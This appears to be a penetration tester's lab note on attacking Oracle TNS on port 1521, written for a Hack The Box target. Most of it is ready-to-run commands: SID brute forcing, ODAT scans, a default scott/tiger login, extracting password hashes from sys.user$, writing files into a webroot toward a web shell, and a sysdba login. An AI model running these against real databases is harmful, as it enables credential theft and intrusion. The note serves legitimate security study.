---
tags:
  - Enumeration
  - TCP
  - Oracle
  - OracleTransparentNetworkSubstrate
  - TNS
aliases:
  - Oracle
---
The `Oracle Transparent Network Substrate` (`TNS`) server is a communication protocol that facilitates communication between Oracle databases and applications over networks. Initially introduced as part of the [Oracle Net Services](https://docs.oracle.com/en/database/oracle/oracle-database/18/netag/introducing-oracle-net-services.html) software suite, TNS supports various networking protocols between Oracle databases and client applications, such as `IPX/SPX` and `TCP/IP` protocol stacks. As a result, it has become a preferred solution for managing large, complex databases in the healthcare, finance, and retail industries. In addition, its built-in encryption mechanism ensures the security of data transmitted, making it an ideal solution for enterprise environments where data security is paramount.

## Walkthroughs

[HTB: Silo | 0xdf hacks stuff](https://0xdf.gitlab.io/2018/08/04/htb-silo.html)


## SID Brute Forcing 

See [[2. Enumeration/TCP/1521. Oracle Transparent Network Substrate (TNS)/2. Information#System Identifiers|SID Information]]

```shell-session
sudo nmap -p1521 -sV 10.129.204.235 --open --script oracle-sid-brute
```

## Enumeration 

Those scans can retrieve database names, versions, running processes, user accounts, vulnerabilities, misconfigurations, etc.

See [[Oracle Database Attacking Tool (ODAT)]]

```shell-session
./odat.py all -s 10.129.204.235
```

## Commands 

See [[SQLPlus]]
## Commands 

There are many [SQLplus commands](https://docs.oracle.com/cd/E11882_01/server.112/e41085/sqlqraa001.htm#SQLQR985) that we can use to enumerate the database manually.
#### Connection 

Where `XE` is a found `SID` and the username/password is `scott` and `tiger`.

```shell-session
sqlplus scott/tiger@10.129.204.235/XE
```

If you come across the following error `sqlplus: error while loading shared libraries: libsqlplus.so: cannot open shared object file: No such file or directory`, please execute the below, taken from [here](https://stackoverflow.com/questions/27717312/sqlplus-error-while-loading-shared-libraries-libsqlplus-so-cannot-open-shared).

```shell-session
sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf";sudo ldconfig
```
### Enumeration

#### User Privilege

```shell-session
select table_name from all_tables;
```

```shell-session
select * from user_role_privs;
```

#### Extract Password Hashes 

```shell-session
select name, password from sys.user$;
```


## Upload Web Shell

If the server is also running a web server we may be able to upload a web shell.
#### File Upload 

```shell-session
./odat.py utlfile -s 10.129.204.235 -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt
```

```shell-session
curl -X GET http://10.129.204.235/testing.txt
```

## Privilege Escalation

If a user is provided appropriate privileges typically granted by the database administer we can try using this account to log in as the System Database Admin (`sysdba`), giving us higher privileges.

```shell-session
sqlplus scott/tiger@10.129.204.235/XE as sysdba
```
